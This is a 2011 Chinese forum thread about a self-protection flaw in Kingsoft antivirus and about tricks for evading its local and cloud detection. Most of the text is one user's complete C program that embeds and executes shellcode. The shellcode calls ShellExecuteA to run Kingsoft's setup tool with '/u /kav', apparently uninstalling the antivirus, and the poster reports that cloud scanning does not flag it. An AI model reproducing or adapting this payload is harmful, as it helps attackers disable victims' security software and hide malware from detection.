★★★一个突破自保漏洞仍未完全修复，并在这个过程中对于绕过自动进云安全防御的总结

seehere

如果是加权的话，什么情况下才转人工呢？

qwe12301

seehere 发表于 2011-6-7 22:50
如果是加权的话，什么情况下才转人工呢？

我感觉加猛壳或者文件变化太大的情况下会这样

jefffire

基本上得出结论是：这个花利用了金山在PE识别方面的bug，导致金山误认为这个是非PE或者损坏PE，直接跳过。

seehere

qwe12301 发表于 2011-6-7 22:52
我感觉加猛壳或者文件变化太大的情况下会这样

我有时用winrar随便压缩一个成自解压也会转人工。

何况加壳猛或变化大其它引擎也应该有反馈。

李白vs苏轼

jefffire 发表于 2011-6-7 22:54
基本上得出结论是：这个花利用了金山在PE识别方面的bug，导致金山误认为这个是非PE或者损坏PE，直接跳过。

鉴定美

z13667152750

很希望李白测试下，现在金山云端可以可以脱几种常用壳

可以使用白文件加壳和黑文件加壳，进行鉴定，根据对照排除单纯报壳的情况

xifanwoai

按你的写报毒
写shellcode不报
不过貌似今天更新已经失效了-0-

1. #include <windows.h>
   
2. #pragma comment(lib,"kernel32.lib")
   
3. #pragma comment(lib,"user32.lib")
   
4. #pragma comment(linker, "/SUBSYSTEM:windows")
   
5. #pragma comment(linker, "/ENTRY:main")
   
6. void main()
   
7. {
   
8.         byte shellcode[]={
   
9.                 0xE8,0x0F,0x01,0x00,0x00,0xC3,0x8B,0xC0,0x55,0x8B,0xEC,0x8B,0x55,0x08,0x33,0xC0,
   
10.                 0xEB,0x16,0x8B,0xC8,0xC1,0xE1,0x03,0x83,0xE1,0xFF,0xC1,0xE8,0x1D,0x0B,0xC8,0x33,
    
11.                 0xC0,0x8A,0x02,0x33,0xC8,0x8B,0xC1,0x42,0x80,0x3A,0x00,0x75,0xE5,0x5D,0xC2,0x04,
    
12.                 0x00,0x8D,0x40,0x00,0x55,0x8B,0xEC,0x83,0xC4,0xE4,0x53,0x56,0x57,0x8B,0x7D,0x0C,
    
13.                 0x8B,0x5D,0x08,0x33,0xC0,0x89,0x45,0xFC,0x8B,0xC3,0x66,0x81,0x38,0x4D,0x5A,0x75,
    
14.                 0x77,0x8B,0x40,0x3C,0x03,0xC3,0x89,0x45,0xF8,0x8B,0x45,0xF8,0x8B,0x40,0x78,0x03,
    
15.                 0xC3,0x89,0x45,0xF4,0x8B,0x45,0xF4,0x8B,0x40,0x20,0x03,0xC3,0x89,0x45,0xEC,0x8B,
    
16.                 0x45,0xF4,0x8B,0x40,0x24,0x03,0xC3,0x89,0x45,0xE8,0x8B,0x45,0xF4,0x8B,0x70,0x18,
    
17.                 0x4E,0x85,0xF6,0x72,0x43,0x46,0x8B,0x45,0xEC,0x8B,0x00,0x03,0xC3,0x89,0x45,0xE4,
    
18.                 0x8B,0x45,0xE4,0x50,0xE8,0x6F,0xFF,0xFF,0xFF,0x3B,0xF8,0x75,0x20,0x8B,0x45,0xF4,
    
19.                 0x8B,0x40,0x1C,0x8B,0x55,0xE8,0x0F,0xB7,0x12,0xC1,0xE2,0x02,0x03,0xC2,0x03,0xC3,
    
20.                 0x89,0x45,0xFC,0x8B,0x45,0xFC,0x03,0x18,0x89,0x5D,0xFC,0xEB,0x0B,0x83,0x45,0xEC,
    
21.                 0x04,0x83,0x45,0xE8,0x02,0x4E,0x75,0xBE,0x8B,0x45,0xFC,0x5F,0x5E,0x5B,0x8B,0xE5,
    
22.                 0x5D,0xC2,0x08,0x00,0x60,0x29,0xC0,0x64,0x8B,0x40,0x30,0x85,0xC0,0x78,0x0C,0x8B,
    
23.                 0x40,0x0C,0x8B,0x70,0x1C,0xAD,0x8B,0x40,0x08,0xEB,0x09,0x8B,0x40,0x34,0x8D,0x40,
    
24.                 0x7C,0x8B,0x40,0x3C,0x89,0x44,0x24,0x1C,0x61,0xC3,0x8B,0xC0,0x55,0x8B,0xEC,0x51,
    
25.                 0x8B,0x45,0x08,0x03,0x45,0x0C,0x89,0x45,0xFC,0x8B,0x45,0xFC,0x59,0x5D,0xC2,0x08,
    
26.                 0x00,0x8D,0x40,0x00,0x55,0x8B,0xEC,0x83,0xC4,0xF8,0x53,0x56,0xE8,0x02,0x00,0x00,
    
27.                 0x00,0xCD,0x01,0x58,0x2D,0x81,0x26,0x41,0x00,0x89,0x45,0xFC,0xB8,0x1C,0x28,0x41,
    
28.                 0x00,0x03,0x45,0xFC,0x89,0x45,0xF8,0x8B,0x5D,0xF8,0x8B,0x45,0xFC,0x89,0x43,0x18,
    
29.                 0xBA,0x94,0x25,0x41,0x00,0x03,0xD0,0x89,0x13,0xBE,0x34,0x26,0x41,0x00,0x03,0x73,
    
30.                 0x18,0x89,0x73,0x04,0x68,0x89,0xFD,0x12,0xA4,0xFF,0xD6,0x50,0xFF,0x13,0x89,0x43,
    
31.                 0x0C,0x68,0x84,0x9B,0x50,0xF2,0xFF,0x53,0x04,0x50,0xFF,0x13,0x8B,0xF0,0x89,0x73,
    
32.                 0x08,0x8B,0x43,0x18,0x50,0x68,0x84,0x27,0x41,0x00,0xE8,0x7D,0xFF,0xFF,0xFF,0x50,
    
33.                 0x8B,0x43,0x18,0x50,0x68,0x90,0x27,0x41,0x00,0xE8,0x6E,0xFF,0xFF,0xFF,0x50,0xFF,
    
34.                 0x53,0x0C,0x50,0xFF,0xD6,0x89,0x43,0x10,0x8B,0x43,0x18,0x50,0x68,0x9C,0x27,0x41,
    
35.                 0x00,0xE8,0x56,0xFF,0xFF,0xFF,0x50,0x8B,0x43,0x18,0x50,0x68,0xAC,0x27,0x41,0x00,
    
36.                 0xE8,0x47,0xFF,0xFF,0xFF,0x50,0xFF,0x53,0x0C,0x50,0xFF,0x53,0x08,0x8B,0xF0,0x89,
    
37.                 0x73,0x14,0x6A,0x00,0x6A,0x00,0x8B,0x43,0x18,0x50,0x68,0xB8,0x27,0x41,0x00,0xE8,
    
38.                 0x28,0xFF,0xFF,0xFF,0x50,0x8B,0x43,0x18,0x50,0x68,0xC0,0x27,0x41,0x00,0xE8,0x19,
    
39.                 0xFF,0xFF,0xFF,0x50,0x8B,0x43,0x18,0x50,0x68,0x00,0x28,0x41,0x00,0xE8,0x0A,0xFF,
    
40.                 0xFF,0xFF,0x50,0x6A,0x00,0xFF,0xD6,0x6A,0x00,0x8B,0x43,0x18,0x50,0x68,0x08,0x28,
    
41.                 0x41,0x00,0xE8,0xF5,0xFE,0xFF,0xFF,0x50,0x8B,0x43,0x18,0x50,0x68,0x10,0x28,0x41,
    
42.                 0x00,0xE8,0xE6,0xFE,0xFF,0xFF,0x50,0x6A,0x00,0xFF,0x53,0x10,0x5E,0x5B,0x59,0x59,
    
43.                 0x5D,0xC3,0x00,0x00,0x4D,0x65,0x73,0x73,0x61,0x67,0x65,0x42,0x6F,0x78,0x41,0x00,
    
44.                 0x75,0x73,0x65,0x72,0x33,0x32,0x2E,0x64,0x6C,0x6C,0x00,0x00,0x53,0x68,0x65,0x6C,
    
45.                 0x6C,0x45,0x78,0x65,0x63,0x75,0x74,0x65,0x41,0x00,0x00,0x00,0x73,0x68,0x65,0x6C,
    
46.                 0x6C,0x33,0x32,0x2E,0x64,0x6C,0x6C,0x00,0x2F,0x75,0x20,0x2F,0x6B,0x61,0x76,0x00,
    
47.                 0x43,0x3A,0x5C,0x50,0x72,0x6F,0x67,0x72,0x61,0x6D,0x20,0x46,0x69,0x6C,0x65,0x73,
    
48.                 0x5C,0x43,0x6F,0x6D,0x6D,0x6F,0x6E,0x20,0x46,0x69,0x6C,0x65,0x73,0x5C,0x4B,0x69,
    
49.                 0x6E,0x67,0x73,0x6F,0x66,0x74,0x5C,0x6B,0x69,0x73,0x63,0x6F,0x6D,0x6D,0x6F,0x6E,
    
50.                 0x5C,0x73,0x65,0x74,0x75,0x70,0x77,0x69,0x7A,0x2E,0x65,0x78,0x65,0x00,0x00,0x00,
    
51.                 0x6F,0x70,0x65,0x6E,0x00,0x00,0x00,0x00,0x4D,0x75,0x72,0x72,0x61,0x79,0x00,0x00,
    
52.                 0xD4,0xD9,0xBC,0xFB,0xB6,0xBE,0xB0,0xD4,0x00,0x00,0x00,0x00,0xC3,0x8D,0x40,0x00,
    
53.                 0x55,0x8B,0xEC,0x33,0xC0,0x55,0x68,0x45,0x28,0x41,0x00,0x64,0xFF,0x30,0x64,0x89,
    
54.                 0x20,0xFF,0x05,0x84,0x48,0x41,0x00,0x33};
    
55.         __asm
    
56.         {
    
57.                 lea eax,shellcode
    
58.                 call eax
    
59.                 xor esp,esp
    
60.                 ret               
    
61.          }
    
62.         }

复制代码

.

   云鉴定也不报   

insight

z13667152750 发表于 2011-6-8 00:11
很希望李白测试下，现在金山云端可以可以脱几种常用壳

可以使用白文件加壳和黑文件加壳，进行鉴定，根据 ...

这根本不是云端脱壳不脱壳的问题，而是本地对pe的识别问题

李白vs苏轼

xifanwoai 发表于 2011-6-8 01:35
按你的写报毒
写shellcode不报
不过貌似今天更新已经失效了-0-.

要是不被报，干嘛那么麻烦呵呵，就是被报，才总结下面的内容

李白vs苏轼

年下 发表于 2011-6-7 20:41
加权~有意思，国内区那个蜂巢进程管家~李白你好像也说是加权了~加权了~以此来降低误报吗？不知道具体是怎么 ...

按引擎的总体实力加权
在权的基础上计算平均数